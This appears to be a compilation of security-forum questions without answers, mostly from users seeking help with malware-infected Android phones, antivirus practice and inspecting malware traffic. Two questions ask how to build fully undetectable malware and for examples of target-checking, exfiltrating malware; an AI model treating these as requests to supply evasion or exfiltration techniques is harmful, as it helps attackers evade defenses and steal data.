Chinese cell phone possessed by the devil – how to exorcise evil malware?

Some months ago, I purchased an Azumi cell phone from an official store in a shopping mall in Mexico and subsequently discovered its firmware contains a ton of malware. The malware connects with a server in China and downloads a load of malicious apps which then launch automatically and eventually render the phone so slow as to be unusable. I have just done a factory reset for the 5th time and expect it to run smoothly for a few weeks until the problems return. I tried installing a new rom but it did not resolve the problem, possibly because the malware is hidden inside a partition. I am not at all literate with android, but am willing to learn and do whatever is necessary to fix this phone. Please can someone advise or point me in the right direction? If I need to root it, how can I do this safely, and how can I locate the offending malware? What diagnostic tests can I perform to learn more about the problem? And if it’s easier to flash a new system, what is the most effective way to do this, and where can I locate a reliable rom? The phone cost me $ 100 and the easiest thing would be to throw it in the trash. However, it’s a perfectly serviceable device and I resent wasting the resources that went into making it. Any help would be sincerely appreciated!

I am looking for names of malware that looks for certain applications or folder or ports before further execution, what are their names? [on hold]

Title says it.

Adding on, malware similiar to stuxnet that looks specifically for date, etc, step 7 project folder.

e.g if the malware was targeting port 3306, MYSQL, it would have to scan port 3306 and then exfiltrate data, without port 3306 present on the host, it will terminate

What are the steps of making a fully undetectable piece of malware?

I’ve been recently taught how antiviruses work. I know that there is more to it but they basically have a list of known malware that they have encountered and every time they scan, they check if their database content matches the scanning files (heard this in an algorithm & data structures class).

Now my question is, what are the steps and things to consider when an attacker wants to make a piece of malware look eligible?

Should the malware be brand new so no-one has ever had an encounter with it, are there practices that take down the previous assumption?

How to avoid malware DIY

Most “how tos” regarding malware list this:

  1. Install Antivirus software.
  2. Install latest antivirus software.
  3. Run antivirus software regularly.
  4. Install latest operating system.
  5. Install any patches to software.
  6. Don’t download random stuff and run it as an application (like .exe files).

I would like to know in a little more detail what all those first steps mean, and what else could be included in this list. For example, LittleSnitch blocks all outgoing and incoming traffic and lets you inspect it first. That would be a good thing to do. Then there is potentially being alerted whenever a script tries to be invoked that you didn’t write yourself, or isn’t installed from a trusted vendor. I’d like to know what other kinds of things you should do beyond this list to have an ideal security environment in regards to avoiding malware.

How to remove a persistent malware?

My Samsung Note 8 has gotten very weird lately. I get programs I never have installed, and when I try to reboot/reset my device with no backup they still come up after I’m finished with the reboot.

I also have in my “SIM” 2 cards, but I only have 1? And I can’t access number. It also shows 2 different IMEIs.

The programs with weird names have all the permissions in my device. Some of them I can’t delete, and some can’t force stop, and they start running after some time.

Facebook was already installed when I did a reboot and the programs started coming in. I have a secure file on my phone. But this program has permission to everything.

How do I get rid of this problem? Do I root my phone? Can some of you guys please help me with this? This is making me a little paranoid.

Some of the programs:

  • Dagger
  • Customrabsclient
  • flexbox
  • istrumentzip
  • OpenCenus
  • rxandroid2
  • agera
  • customclient

I have used many anti-viruses like McAfee, Bitdefender, etc. I have factory reset my computer 2 times, but nothing changes. I have now downloaded AFWall+ to try to stop all these files, but I want to delete them all.

And when I check root manager it says that my phone is not rooted in the proper way. I never ever have rooted this phone.

How can I identify the cache if I see its name? One belongs to malware

If Device maintenance app is launched in Samsung S8, after pressing Clean Now button, storage cleanup briefly shows different apps, storage space of which is being cleaned:

System cache OneNote TopBuzz 

I know that the last one is a malware and is not present in my list of apps, but how can I find out to which app it actually belongs? No antivirus which I tried so far reported this as a malware. But maybe there is some system analyzer which shows similar cache ownership like the above app, but with more details?

(Or maybe there is another method how to find origin of that TopBuzz symptom.)

The phone is not rooted.

Decrypting SSL traffic using Fiddler to see requests being sent by malware written in .NET

I tried to find the GET data of some malware but it appears that this malware is encrypting traffic using SSL.

When I tried to decrypt the SSL data via Fiddler, I always get nothing — only information about the SSL configuration as you can see in the picture.

This is the picture

  • I installed Fiddler’s root certificate;
  • This is .NET malware.

Is there a way to read the data?